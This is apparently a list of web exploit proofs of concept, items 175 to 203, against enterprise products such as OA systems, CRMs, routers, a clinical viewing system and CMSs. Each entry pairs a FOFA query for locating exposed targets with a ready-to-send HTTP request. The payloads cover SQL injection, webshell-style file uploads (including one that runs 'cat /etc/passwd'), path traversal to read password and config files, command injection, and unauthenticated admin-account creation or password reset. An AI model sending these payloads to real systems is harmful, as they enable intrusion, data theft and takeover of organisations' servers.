175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--



177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded


action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded


username=test1234&pwd=test1234&savedays=1


183. Guangzhou 图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. SunFull (迅饶科技) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest


insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. Realor (瑞友) 天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded


object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. LANWON (蓝网科技) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded


<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}


193. Hillstone (山石网科) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}



197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close



198. Alibaba Cloud Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit assetsmanager/upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain the session cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returning csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returning:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. Founder (方正) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
